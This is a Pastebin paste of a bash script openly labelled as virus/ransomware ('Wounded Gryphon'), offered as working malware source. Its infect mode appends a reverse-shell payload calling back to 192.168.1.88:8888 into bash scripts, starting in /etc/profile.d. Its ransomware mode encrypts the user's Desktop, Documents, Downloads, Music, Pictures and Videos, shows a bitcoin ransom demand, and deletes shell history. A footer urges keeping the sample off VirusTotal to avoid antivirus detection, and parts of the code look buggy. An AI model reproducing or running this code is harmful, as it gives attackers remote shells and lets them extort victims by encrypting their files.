FlyFar

WoundedGryphon - A virus/ransomware written in bash by @Da2dalus - MalDev101

Mar 28th, 2023
143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 22.84 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2.  
  3. #                   #
  4. #    __      __      \                .___         .___
  5. #   /  \    /  \____  \_ __  ____   __| _/____   __| _/ ---------
  6. #   \   \/\/   /  _ \|  |  \/    \ / __ _/ __ \ / __ | -----------
  7. #    \        (  <_> |  |  |   |  / /_/ \  ___// /_/ | ------------
  8. #     \__/\  / \____/|____/|___|  \____ |\___  \____ | -----------
  9. #     _____\/                   \/ __  \/    \/     \/ ----------
  10. #    /  ___ \_______ ___.________ |  |__   ____   ____  ---------
  11. #   /   \  __\_  __ <   |  \____ \|  |  \ /  _ \ /    \ ----------
  12. #   \    \_\  |  | \/\___  |  |_> |   Y  (  <_> |   |  \ ----------
  13. #    \______  |__|   / ____|   __/|___|  /\___\/|___|  / ----------
  14. #       /   \/       \/    |__|        \/      \     \/ ---------
  15. #      / Wonded Gryphon v4.3  ______----------- # ---------------
  16. #     #          _______,---'__,---' ---------------------------
  17. #            _,-'---_---__,---' -----------------------------
  18. #     /_ #   (,  ---____', --------------------------------
  19. #    /  /,,   `, ,-' -------------------------------------
  20. #   ;/)   ,',,_/,' # -------------------------------------
  21. #   | /\   ,.'//\ / ---------------------------------------
  22. #   `-` \ ,,'    /.   # -------------------------------------
  23. #        `',   ,-- `./ -----------------------------------------
  24. #        '/ / |     /`, -----------------------------------------
  25. #        //'',.\_    .\\ -----,{==>- ------------------------------
  26. #     __//   __;_`-  \ `;.__,;' ------------------------------------
  27. #   ((,--,) (((,------;  `--' --------------------------------------
  28. #
  29. # Created by Da2dalus a MalDev101 project
  30. # This is only an experiment but it can be dangerous.
  31. # I am not responsible for the damage.
  32. # This is a virus/ransomware that works on unix systems with bash installed.
  33. # Tested on Linux (Ubuntu, Debian)
  34.  
  35. SHEBANG="#!/bin/bash"
  36.  
  37. ME="$0"
  38.  
  39. CAT=$(cat "$ME")
  40.  
  41. VERSION="v4.3"
  42.  
  43. OFLAG="$1"
  44.  
  45. # Configuration -------------------------------------------------------------------------------------------------------------#
  46.  
  47. # Virus mode configuration ----------------------------------------------------$
  48.  
  49. FLAG="#arrow"
  50.  
  51. # ------------------------------------------------------------------>
  52.  
  53. # String you want to append to sh file. Example: reverse tcp bash (metasploit).
  54. # Responds to:
  55. # IP: 192.168.1.88
  56. # PORT: 8888
  57.  
  58. PAYLOAD="0<&205-;exec 205<>/dev/tcp/192.168.1.88/8888;sh <&205 >&205 2>&205" # Choose payload when infecting
  59.  
  60. # ------------------------------------------------------------------->
  61.  
  62. MAXINFECTCOUNT=50 # Maximum infected files
  63.  
  64. # ------------------------------------------------------------------------------$
  65.  
  66. # Ransomware mode configuration ------------------------------------------------$
  67.  
  68. KEY="GrYpHoN" # KEY
  69.  
  70. CCRYPT="/bin/ccrypt"
  71.  
  72. # ------------------------------------------------------------------------------$
  73.  
  74. # ----------------------------------------------------------------------------------------------------------------------------#
  75.  
  76. # Colors and special caracters
  77.  
  78. # Reset
  79. NC='\033[0m'       # Text Reset
  80.  
  81. BLINK=$(tput blink)
  82.  
  83. # Regular Colors
  84. Black='\033[0;30m'        # Black
  85. Red='\033[0;31m'          # Red
  86. Green='\033[0;32m'        # Green
  87. Yellow='\033[0;33m'       # Yellow
  88. Blue='\033[0;34m'         # Blue
  89. Purple='\033[0;35m'       # Purple
  90. Cyan='\033[0;36m'         # Cyan
  91. White='\033[0;37m'        # White
  92.  
  93. # Bold
  94. BBlack='\033[1;30m'       # Black
  95. BRed='\033[1;31m'         # Red
  96. BGreen='\033[1;32m'       # Green
  97. BYellow='\033[1;33m'      # Yellow
  98. BBlue='\033[1;34m'        # Blue
  99. BPurple='\033[1;35m'      # Purple
  100. BCyan='\033[1;36m'        # Cyan
  101. BWhite='\033[1;37m'       # White
  102.  
  103. # Underline
  104. UBlack='\033[4;30m'       # Black
  105. URed='\033[4;31m'         # Red
  106. UGreen='\033[4;32m'       # Green
  107. UYellow='\033[4;33m'      # Yellow
  108. UBlue='\033[4;34m'        # Blue
  109. UPurple='\033[4;35m'      # Purple
  110. UCyan='\033[4;36m'        # Cyan
  111. UWhite='\033[4;37m'       # White
  112.  
  113. # Background
  114. On_Black='\033[40m'       # Black
  115. On_Red='\033[41m'         # Red
  116. On_Green='\033[42m'       # Green
  117. On_Yellow='\033[43m'      # Yellow
  118. On_Blue='\033[44m'        # Blue
  119. On_Purple='\033[45m'      # Purple
  120. On_Cyan='\033[46m'        # Cyan
  121. On_White='\033[47m'       # White
  122.  
  123. # High Intensity
  124. IBlack='\033[0;90m'       # Black
  125. IRed='\033[0;91m'         # Red
  126. IGreen='\033[0;92m'       # Green
  127. IYellow='\033[0;93m'      # Yellow
  128. IBlue='\033[0;94m'        # Blue
  129. IPurple='\033[0;95m'      # Purple
  130. ICyan='\033[0;96m'        # Cyan
  131. IWhite='\033[0;97m'       # White
  132.  
  133. # Bold High Intensity
  134. BIBlack='\033[1;90m'      # Black
  135. BIRed='\033[1;91m'        # Red
  136. BIGreen='\033[1;92m'      # Green
  137. BIYellow='\033[1;93m'     # Yellow
  138. BIBlue='\033[1;94m'       # Blue
  139. BIPurple='\033[1;95m'     # Purple
  140. BICyan='\033[1;96m'       # Cyan
  141. BIWhite='\033[1;97m'      # White
  142.  
  143. # High Intensity backgrounds
  144. On_IBlack='\033[0;100m'   # Black
  145. On_IRed='\033[0;101m'     # Red
  146. On_IGreen='\033[0;102m'   # Green
  147. On_IYellow='\033[0;103m'  # Yellow
  148. On_IBlue='\033[0;104m'    # Blue
  149. On_IPurple='\033[0;105m'  # Purple
  150. On_ICyan='\033[0;106m'    # Cyan
  151. On_IWhite='\033[0;107m'   # White
  152.  
  153. # List made by Shakiba Moshiri
  154.  
  155. # All the BANNERS
  156.  
  157. function banner1() {
  158.    
  159.    echo -e "$Blue                _ #      _ $NC"
  160.    echo -e "$Blue              _/|  \ _   |\_ $NC"
  161.    echo -e "$Blue            _/_ |   \|\\ | _\ $NC"
  162.    echo -e "$Blue          _/_/| /  /   \|\ |\_\_     # $NC"
  163.    echo -e "$Blue        _/_/  |/  /  _  \/\|  \_\_  / $NC"
  164.    echo -e "$Blue      _/_/    ||  | | \*/ ||    \_\/   $NC"
  165.    echo -e "$Blue     /_/  | | |\  | \_ /  /| | |  \_\   # $NC"
  166.    echo -e "$Blue    //    ||| | \_/   \__/ | |||    \\ / $NC"
  167.    echo -e "$Blue   // __| ||\  \ ||    || /  /|| |__ \/ $NC"
  168.    echo -e "$Blue  //_/ \|||| \/\\||    ||//\/ ||||/ \_\\ $NC"
  169.    echo -e "$Blue ///    \\\\/   /()    ()\   \////    \\\ $NC"
  170.    echo -e "$Blue |/      \/    |    |    |     \/      \| $NC"
  171.    echo -e "$Blue              /_|  | |_  \  # $NC"
  172.    echo -e "$Blue              ///_| |_||\_ \/ $NC"
  173.    echo -e "$Blue              |//||/||\/||\/       WOUNDED GRYPHON $VERSION $NC"
  174.    echo -e "$Blue               / || ||/||/\/    $NC"
  175.    echo -e "$Blue                 {}/|| {}        $NC"
  176.    echo -e "$Blue                    ||            $NC"
  177.    echo -e "$Blue                    () $NC"
  178. }
  179.  
  180. function banner2() {
  181.  
  182.    echo -e "$BLINK $Cyan
  183.                ++01100101 01110101++             =ඏ=             ++10101110 10100110++
  184.              +011100110110   01001111000      0♢0Ŧ0♢0     00011110010   011011001110+
  185.          +0110010001100101 0110000101100100   000卄000   0010011010000110 1010011000100110+
  186.            +01101101011000010111001001101011++00+0卄00++++11010110010011101000011010110110+
  187.                0111001101100  0010110111001100100 ⁆⁅ 0010011001110110100  0011011001110
  188.                      011001100 110000101110010++= ⁆⁅ =++010011101000011 001100110
  189.                        +01 10100001100101011 10010ʞk01001 11010100110000101 10+
  190.                            +0111010001101111  +01ʞk10+  1111011000101110+
  191.                                +110101011011  00.∴.00  110110101011+
  192.                                  +01100101     0+1ʞk1+0    10100110+
  193.                                  +1100101     +0+.∴.+0+     1010011+
  194.                                    +1110010   +0+.∴.+0+   0100111+
  195.                                      +1110100  01 ∴ 10  0010111+
  196.                                                10 ∴ 01
  197.                                                10 ∵ 01
  198.                                                00.00
  199.                                                  : : $NC
  200.                 $BBlue Do you got what it takes? $NC
  201.                           $BWhite https://bit.ly/3b83sD9 $NC"
  202. }
  203.  
  204. function banner3() {
  205.    echo -e " $Cyan
  206.                         # ------------------------------------------
  207.          __      __      \ -------------- .___ ------- .___ --------
  208.         /  \    /  \____  \_ __  ____   __| _/____   __| _/ ---------
  209.         \   \/\/   /  _ \|  |  \/    \ / __ _/ __ \ / __ | -----------
  210.          \        (  <_> |  |  |   |  / /_/ \  ___// /_/ | ------------
  211.           \__/\  / \____/|____/|___|  \____ |\___  \____ | -----------
  212.           _____\/                   \/ __  \/    \/     \/ ----------
  213.          /  ___ \_______ ___.________ |  |__   ____   ____  ---------
  214.         /   \  __\_  __ <   |  \____ \|  |  \ /  _ \ /    \ ----------
  215.         \    \_\  |  | \/\___  |  |_> |   Y  (  <_> |   |  \ ----------
  216.          \______  |__|   / ____|   __/|___|  /\___\/|___|  / ----------
  217.             /   \/       \/    |__|        \/      \     \/ ---------
  218.            /$NC $BBlue Wonded Gryphon $VERSION $NC $Cyan---------------- # ---------------
  219.           # ---------------------------------------------------------- $NC"
  220. }
  221.  
  222. function banner4() {
  223.    echo -e "$Blue
  224.                   _________
  225.                  / ======= \
  226.                 / __________\
  227.                | ___________ |
  228.                | | I Love  | |
  229.                | |  BASH   | |
  230.                | |_________| |________________________
  231.                \=____________/                        )
  232.                / ........... \   WOUNDED GRYPHON     /
  233.               / ::::::::::::: \      $VERSION        =D-'
  234.              (_________________) $NC"
  235. }
  236.  
  237. function banner5() {
  238.    echo -e "$Red  █     █░ ▒█████   █    ██  ███▄    █ ▓█████▄ ▓█████ ▓█████▄   ▄████  ██▀███ ▓██   ██▓ ██▓███   ██░ ██  ▒█████   ███▄    █  $NC";
  239.    echo -e "$Red ▓█░ █ ░█░▒██▒  ██▒ ██  ▓██▒ ██ ▀█   █ ▒██▀ ██▌▓█   ▀ ▒██▀ ██▌ ██▒ ▀█▒▓██ ▒ ██▒▒██  ██▒▓██░  ██▒▓██░ ██▒▒██▒  ██▒ ██ ▀█   █  $NC";
  240.    echo -e "$Red ▒█░ █ ░█ ▒██░  ██▒▓██  ▒██░▓██  ▀█ ██▒░██   █▌▒███   ░██   █▌▒██░▄▄▄░▓██ ░▄█ ▒ ▒██ ██░▓██░ ██▓▒▒██▀▀██░▒██░  ██▒▓██  ▀█ ██▒ $NC";
  241.    echo -e "$Red ░█░ █ ░█ ▒██   ██░▓▓█  ░██░▓██▒  ▐▌██▒░▓█▄   ▌▒▓█  ▄ ░▓█▄   ▌░▓█  ██▓▒██▀▀█▄   ░ ▐██▓░▒██▄█▓▒ ▒░▓█ ░██ ▒██   ██░▓██▒  ▐▌██▒ $NC";
  242.    echo -e "$Red ░░██▒██▓ ░ ████▓▒░▒▒█████▓ ▒██░   ▓██░░▒████▓ ░▒████▒░▒████▓ ░▒▓███▀▒░██▓ ▒██▒ ░ ██▒▓░▒██▒ ░  ░░▓█▒░██▓░ ████▓▒░▒██░   ▓██░ $NC";
  243.    echo -e "$Red ░ ▓░▒ ▒  ░ ▒░▒░▒░ ░▒▓▒ ▒ ▒ ░ ▒░   ▒ ▒  ▒▒▓  ▒ ░░ ▒░ ░ ▒▒▓  ▒  ░▒   ▒ ░ ▒▓ ░▒▓░  ██▒▒▒ ▒▓▒░ ░  ░ ▒ ░░▒░▒░ ▒░▒░▒░ ░ ▒░   ▒ ▒  $NC";
  244.    echo -e "$Red   ▒ ░ ░    ░ ▒ ▒░ ░░▒░ ░ ░ ░ ░░   ░ ▒░ ░ ▒  ▒  ░ ░  ░ ░ ▒  ▒   ░   ░   ░▒ ░ ▒░▓██ ░▒░ ░▒ ░      ▒ ░▒░ ░  ░ ▒ ▒░ ░ ░░   ░ ▒░ $NC";
  245.    echo -e "$Red   ░   ░  ░ ░ ░ ▒   ░░░ ░ ░    ░   ░ ░  ░ ░  ░    ░    ░ ░  ░ ░ ░   ░   ░░   ░ ▒ ▒ ░░  ░░        ░  ░░ ░░ ░ ░ ▒     ░   ░ ░  $NC";
  246.    echo -e "$Red     ░        ░ ░     ░              ░    ░       ░  ░   ░          ░    ░     ░ ░               ░  ░  ░    ░ ░           ░  $NC";
  247.    echo -e "$Red                                        ░              ░                       ░ ░                                           $NC";
  248.  
  249. }
  250.  
  251. function banner_text() {
  252.    
  253.    echo -e " $UBlue
  254.  
  255.   # Created by Da2dalus a MalDev101 project
  256.   # This is only an experiment but it can be dangerous.
  257.   # I am not responsible for the damage.
  258.   # This is a virus/ransomware that works on unix systems with bash installed.
  259.   # Tested on Linux (Ubuntu, Debian) and MacOS (OSX)
  260.   # $NC
  261.   $BBlue# If virus mode: $NC
  262.   $UBlue#
  263.   # Check if files are written in bash then start infecting them.
  264.   # The virus ignores non bash scripts and already infected files
  265.   # $NC
  266.   $BBlue# If ransomware mode: $NC
  267.   $UBlue#
  268.   # Encrypt files in Desktop, Videos ... $NC"
  269. }
  270.  
  271. function error() {
  272.  
  273.    echo -e "$Red $BLINK _______________________________ ________ __________._. $NC"
  274.    echo -e "$Red $BLINK \_   _____/\______   \______   \\_____  \\______   \ | $NC"
  275.    echo -e "$Red $BLINK  |    __)_  |       _/|       _/ /   |   \|       _/ | $NC"
  276.    echo -e "$Red $BLINK  |        \ |    |   \|    |   \/    |    \    |   \\| $NC"
  277.    echo -e "$Red $BLINK /_______  / |____|_  /|____|_  /\_______  /____|_  /__ $NC"
  278.    echo -e "$Red $BLINK         \/         \/        \/         \/       \/ \/ $NC"
  279.  
  280.    echo -e "     "
  281. }
  282.  
  283. function helpfunction() {
  284.  
  285.    echo -e "$BCyan Available opions: $NC"
  286.    echo -e " "
  287.    echo -e "$UCyan Show this page: --help $NC"
  288.    echo -e "$UCyan Infect all bash files on the system: --infect $NC"
  289.    echo -e "$UCyan Encrypt files in Desktop, Videos ...: --encrypt $NC"
  290.    echo -e "$UCyan Self destruct when done: (--infect, --encrypt) --self-destruct $NC"
  291.    echo -e "$UCyan Unencrypt files: --unencrypt $NC"
  292.    echo -e "$UCyan Uninfect system: --uninfect $NC"
  293.    echo -e "$UCyan Only show random banner: --banner $NC"
  294.  
  295. }
  296.  
  297. # Cleanup function
  298.  
  299. function cleanup() {
  300.    
  301.    echo "#!/bin/bash" > Gryphon.sh
  302.    echo "sleep 8" >> Gryphon.sh
  303.    echo "sudo mv $ME /dev/null" >> Gryphon.sh
  304.    chmod 755 Gryphon.sh
  305.    ./Gryphon
  306.    exit
  307. }
  308.  
  309.  
  310. # Virus mode
  311.  
  312. function check() {
  313.    
  314.    local IFBASH=$(grep -Fx "$SHEBANG" *)
  315.    
  316.    if [ "$IFBASH" =~ .*"$SHEBANG" ]
  317.  
  318.    then
  319.      
  320.       local LISTNOTREADY=$(echo "$IFBASH" | sed 's|:#!/bin/bash||')
  321.       local LISTNOTREADYD=$(echo "$LISTNOTREADY" | tr "\n" " ")
  322.       local LISTNOTREADY2=$(grep -Fx "$FLAG" "$LISTNOTREADYD")
  323.       local LISTNOTREADY2D=$(echo "$LISTNOTREADY2" | sed '/bar/,+1 d')
  324.       LIST=$(echo "$LISTNOTREADY2D" | tr "\n" " ")
  325.        
  326.       if [ "$LIST" == "" ]
  327.        
  328.       then
  329.          
  330.          foldercheck
  331.      
  332.       else
  333.          
  334.          infect
  335.      
  336.       fi
  337.      
  338.     else
  339.        
  340.        foldercheck
  341.        
  342.     fi
  343.    
  344. }
  345.  
  346. function foldercheck() {
  347.    
  348.    local LDIR=$(ls -d *)
  349.    
  350.    if [ "$LDIR" == "" ]
  351.  
  352.    then
  353.       cd /
  354.  
  355.       check
  356.  
  357.    else
  358.          
  359.       echo "$LDIR" > LIST.txt
  360.      
  361.       CDDIR=$(shuf -n1 LIST.txt)
  362.      
  363.       cd "$CDDIR"
  364.      
  365.       check
  366.    fi
  367. }
  368.  
  369. # PAYLOAD
  370.  
  371. function infect() {
  372.    
  373.    # String you want to append to sh file. Example: reverse tcp bash (metasploit).
  374.    # Responds to:
  375.    # IP: 192.168.1.88
  376.    # PORT: 8888
  377.  
  378.    echo "$PAYLOAD" >> "$LIST"
  379.    echo "$FLAG" >> "$LIST"
  380.  
  381.    INFECTCOUNT=$(($INFECTCOUNT + 1))
  382.  
  383.    if [ "$INFECTCOUNT" == "$MAXINFECTCOUNT" ]
  384.  
  385.    then
  386.       if grep -q --self-destruct <<<"$@"
  387.  
  388.       then
  389.          echo -e "$BBlue Done...$NC"
  390.          cleanup
  391.    
  392.       else
  393.          echo -e "$BBlue Done...$NC"
  394.          exit
  395.    
  396.       fi
  397.    
  398.    else
  399.       check
  400.    
  401.    fi
  402.    
  403. }
  404.  
  405. # choose a random banner
  406.  
  407. function CHOOSE_BANNER() {
  408.    
  409.    banners=(banner1 banner2 banner3 banner4 banner5) ;
  410.    THECHOSENONE="${banners[RANDOM%${#banners[@]}]}";
  411. }
  412.  
  413. CHOOSE_BANNER
  414.  
  415. function BANNER() {
  416.    
  417.    "$THECHOSENONE"
  418.    echo "   "
  419.    banner_text
  420. }
  421.  
  422. # start infecting autostart
  423.  
  424. function virus_start() {
  425.    
  426.    BANNER # Very important :)
  427.    
  428.    cd /etc/profile.d/
  429.    
  430.    check
  431.    
  432. }
  433.  
  434. # RANSOMWARE MODE
  435.  
  436. function ccryptcheck() {
  437.    
  438.    if [ -f "$CCRYPT" ]
  439.  
  440.    then
  441.       scan
  442.    
  443.    else
  444.       sudo apt install ccrypt -yy
  445.       brew install ccrypt
  446.       yum install ccrypt
  447.       pacman install ccrypt
  448.       ccryptcheck
  449.    
  450.    fi
  451. }
  452.  
  453. function encryptvideos() {
  454.    
  455.    cd "$HOME"
  456.    cd Videos
  457.    local LS=$(ls -a)
  458.    local LIST=$(echo "$LS" | tr "\n" " ")
  459.    ccencrypt "$LIST" -k "$KEY"
  460.    for f in *.cpt; do
  461.       mv -- "$f" "${f%.cpt}.WOUND"
  462.    done
  463.  
  464. }
  465.  
  466. function encryptdesktop() {
  467.    
  468.    cd "$HOME"
  469.    cd Desktop
  470.    local LS=$(ls -a)
  471.    local LIST=$(echo "$LS" | tr "\n" " ")
  472.    ccencrypt "$LIST" -k "$KEY"
  473.    for f in *.cpt; do
  474.       mv -- "$f" "${f%.cpt}.WOUND"
  475.    done
  476.  
  477. }
  478.  
  479. function encryptpictures() {
  480.    
  481.    cd "$HOME"
  482.    cd Pictures
  483.    local LS=$(ls -a)
  484.    local LIST=$(echo "$LS" | tr "\n" " ")
  485.    ccencrypt "$LIST" -k "$KEY"
  486.    for f in *.cpt; do
  487.       mv -- "$f" "${f%.cpt}.WOUND"
  488.    done
  489.  
  490. }
  491.  
  492. function encryptdocuments() {
  493.    
  494.    cd "$HOME"
  495.    cd Documents
  496.    local LS=$(ls -a)
  497.    local LIST=$(echo "$LS" | tr "\n" " ")
  498.    ccencrypt "$LIST" -k "$KEY"
  499.    for f in *.cpt; do
  500.       mv -- "$f" "${f%.cpt}.WOUND"
  501.    done
  502.  
  503. }
  504.  
  505. function encryptdownloads() {
  506.    
  507.    cd "$HOME"
  508.    cd Downloads
  509.    local LS=$(ls -a)
  510.    local LIST=$(echo "$LS" | tr "\n" " ")
  511.    ccencrypt "$LIST" -k "$KEY"
  512.    for f in *.cpt; do
  513.       mv -- "$f" "${f%.cpt}.WOUND"
  514.    done
  515.  
  516. }
  517.  
  518. function encryptmusic() {
  519.    
  520.    cd "$HOME"
  521.    cd Music
  522.    local LS=$(ls -a)
  523.    local LIST=$(echo "$LS" | tr "\n" " ")
  524.    ccencrypt "$LIST" -k "$KEY"
  525.    for f in *.cpt; do
  526.       mv -- "$f" "${f%.cpt}.WOUND"
  527.    done
  528.  
  529. }
  530.  
  531. function ransom_start() {
  532.    
  533.    BANNER
  534.    ccryptcheck
  535.    sleep 5
  536.    encryptdesktop
  537.    sleep 5
  538.    encryptdocuments
  539.    sleep 5
  540.    encryptdownloads
  541.    sleep 5
  542.    zenity --warning --text="Your files are encrypted by Wounded Gryphon! Pay 500$ worth in bitcoin to this bitcoin address: Your Bitcoin Address so you can receive the decrypt instructions"
  543.    encryptmusic
  544.    sleep 5
  545.    encryptpictures
  546.    sleep 5
  547.    encryptvideos
  548.    cd "$HOME" && rm .bash_history
  549.    sleep 5
  550.    
  551.    if grep -q --self-destruct <<<"$@"
  552.  
  553.    then
  554.       echo -e "$BBlue Done...$NC"
  555.       cleanup
  556.    
  557.    else
  558.       echo -e "$BBlue Done...$NC"
  559.       exit
  560.    
  561.    fi
  562.    
  563. }
  564.  
  565. # Uninfect
  566.  
  567. function remcheck() {
  568.    
  569.    local IFBASH=$(grep -Fx "$SHEBANG" *)
  570.    
  571.    if grep -q "$SHEBANG" <<<"$IFBASH"
  572.  
  573.    then
  574.      
  575.       local LISTNOTREADY=$(echo "$IFBASH" | sed 's|:#!/bin/bash||')
  576.       local LISTNOTREADYD=$(echo "$LISTNOTREADY" | tr "\n" " ")
  577.       local LISTNOTREADY2=$(grep -Fx "$FLAG" "$LISTNOTREADYD")
  578.       local LISTNOTREADY2D=$(echo "$LISTNOTREADY2" | sed 's|:#arrow||')
  579.       LIST=$(echo "$LISTNOTREADY2D" | tr "\n" " ")
  580.        
  581.       if [ "$LIST" == "" ]
  582.        
  583.       then
  584.          
  585.          remfoldercheck
  586.      
  587.       else
  588.          
  589.          uninfect
  590.      
  591.       fi
  592.      
  593.     else
  594.        
  595.        remfoldercheck
  596.        
  597.     fi
  598.    
  599. }
  600.  
  601. function remfoldercheck() {
  602.    
  603.    local LDIR=$(ls -d *)
  604.    
  605.    if [ "$LDIR" == "" ]
  606.  
  607.    then
  608.       cd /
  609.  
  610.       remcheck
  611.  
  612.    else
  613.          
  614.       echo "$LDIR" > LIST.txt
  615.      
  616.       CDDIR=$(shuf -n1 LIST.txt)
  617.      
  618.       cd "$CDDIR"
  619.      
  620.       remcheck
  621.    fi
  622. }
  623.  
  624.  
  625. function uninfect() {
  626.    
  627.    sed -i '/"$PAYLOAD"/d' "$LIST"
  628.    sed -i '/"$FLAG"/d' "$LIST"
  629.  
  630.    RINFECTCOUNT=$(($RINFECTCOUNT + 1))
  631.  
  632.    if [ "$RINFECTCOUNT" == $MAXINFECTCOUND ]
  633.  
  634.    then
  635.    
  636.       if grep -q --self-destruct <<<"$@"
  637.    
  638.       then
  639.          echo -e "$BBlue Done...$NC"
  640.          cleanup
  641.    
  642.       else
  643.          echo -e "$BBlue Done...$NC"
  644.          exit
  645.    
  646.       fi
  647.    
  648.    else
  649.       remcheck
  650.    
  651.    fi
  652.    
  653. }
  654.  
  655. function uninfectstart() {
  656.    
  657.    BANNER # Very important :)
  658.  
  659.    cd /etc/profile.d/
  660.  
  661.    remcheck
  662.    
  663. }
  664.  
  665. # Unencrypt
  666.  
  667. function unencryptvideos() {
  668.    
  669.    cd "$HOME"
  670.    cd Videos
  671.    local LS=$(ls -a)
  672.    local LIST=$(echo "$LS" | tr "\n" " ")
  673.    ccdecrypt "$LIST" -K "$KEY"
  674. }
  675.  
  676. function unencryptdesktop() {
  677.    
  678.    cd "$HOME"
  679.    cd Desktop
  680.    local LS=$(ls -a)
  681.    local LIST=$(echo "$LS" | tr "\n" " ")
  682.    ccdecrypt "$LIST" -K "$KEY"
  683. }
  684.  
  685. function unencryptpictures() {
  686.    
  687.    cd "$HOME"
  688.    cd Pictures
  689.    local LS=$(ls -a)
  690.    local LIST=$(echo "$LS" | tr "\n" " ")
  691.    ccdecrypt "$LIST" -K "$KEY"
  692. }
  693.  
  694. function unencryptdocuments() {
  695.    
  696.    cd "$HOME"
  697.    cd Documents
  698.    local LS=$(ls -a)
  699.    local LIST=$(echo "$LS" | tr "\n" " ")
  700.    ccdecrypt "$LIST" -K "$KEY"
  701. }
  702.  
  703. function unencryptdownloads() {
  704.    
  705.    cd "$HOME"
  706.    cd Downloads
  707.    local LS=$(ls -a)
  708.    local LIST=$(echo "$LS" | tr "\n" " ")
  709.    ccdecrypt "$LIST" -K "$KEY"
  710.  
  711. }
  712.  
  713. function unencryptmusic() {
  714.    
  715.    cd "$HOME"
  716.    cd Music
  717.    local LS=$(ls -a)
  718.    local LIST=$(echo "$LS" | tr "\n" " ")
  719.    ccdecrypt "$LIST" -K "$KEY"
  720.  
  721. }
  722.  
  723. function unencrypt() {
  724.    
  725.    BANNER
  726.    ccryptcheck
  727.    sleep 5
  728.    unencryptdesktop
  729.    sleep 5
  730.    unencryptdocuments
  731.    sleep 5
  732.    unencryptdownloads
  733.    sleep 5
  734.    unencryptmusic
  735.    sleep 5
  736.    unencryptpictures
  737.    sleep 5
  738.    unencryptvideos
  739.    cd "$HOME" && rm .bash_history
  740.    sleep 5
  741.    
  742.    if grep -q --self-destruct <<<"$@"
  743.  
  744.    then
  745.       echo -e "$BBlue Done...$NC"
  746.       cleanup
  747.    
  748.    else
  749.       echo -e "$BBlue Done...$NC"
  750.       exit
  751.    
  752.    fi
  753.    
  754. }
  755.  
  756. # Start
  757.  
  758. if [ "$OFLAG" == "--infect" ]
  759.  
  760. then
  761.    virus_start
  762.  
  763. elif [ "$OFLAG" == "--encrypt" ]
  764.  
  765. then
  766.    ransom_start
  767.    
  768. elif [ "$OFLAG" == "--uninfect" ]
  769.  
  770. then
  771.    uninfect
  772.  
  773. elif [ "$OFLAG" == "--help" ]
  774.  
  775. then
  776.    helpfunction
  777.    
  778. elif [ "$OFLAG" == "--unencrypt" ]
  779.  
  780. then
  781.    unencrypt
  782.  
  783. elif [ "$OFLAG" == "--banner" ]
  784.  
  785. then
  786.    BANNER
  787.  
  788. elif [ $# -le 0 ]
  789.  
  790. then
  791.    error
  792.    echo -e "   "
  793.    echo -e "$Red No arguments specified! $NC"
  794.    echo -e "$Red Use$NC $BRed--help$NC $Red to display options.$NC"
  795.  
  796. else
  797.    error
  798.    echo -e "   "
  799.    echo -e "$Red No such argument available!$NC"
  800.    echo -e "$Red Use$NC $BRed--help$NC $Red to display options.$NC"
  801.  
  802. fi
  803.  
  804.  
  805. #    |\                     /)      
  806. #  /\_\\__               (_//
  807. # |   `>\-`     _._       //`)  
  808. #  \ /` \\  _.-.---.`-._ //
  809. #   `    \|`  /     \  `|/
  810. #         |   \.@-@./   |
  811. #         |.../`\_/`\...|
  812. #         |:://  _  \\::|
  813. #         | | \     )|_ |
  814. #         \/`\_`>  <_/ \/
  815. #          \__/'---'\__/
  816. #           `-. ::: .-'
  817. #            //`:::`\\
  818. #           //   '   \\
  819. #          |/         \\
  820. #
  821. # PLEASE DO NOT COPY THE SOURCE CODE OF THIS PROJECT AND RENAME IT
  822. # THAT'S NOT CREATING THAT IS STEALING.
  823. #
  824. # THIS SOFTWARE IS PROTECTED BY A GNU PUBLIC LICENSE
  825. #
  826. # DO NOT UPLOAD THIS SAMPLE ON VIRUS TOTAL TO PREVENT
  827. # ANTI VIRUS DETECTION.
  828. #
  829. # I AND THE TEAM ARE NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY
  830. # THIS SOFTWARE!
  831. #
  832. # THANKS FOR THE PEOPLE WHO ADDET THERE CODE TO THIS PROJECT
  833. # AND SUPPORTED IT
  834. #
  835. # NEW VERSIONS WILL BE COMING SOON (I HOPE)
  836. #
  837. # Greetings from the MalDev101 TEAM
Add Comment
Please, Sign In to add comment